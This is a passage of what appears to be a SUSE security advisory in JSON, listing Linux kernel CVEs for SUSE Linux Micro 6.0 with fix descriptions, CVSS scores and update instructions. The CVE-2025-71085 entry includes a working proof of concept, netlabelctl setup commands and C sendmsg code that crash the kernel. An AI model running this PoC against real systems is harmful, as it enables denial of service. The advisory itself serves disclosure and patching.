"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 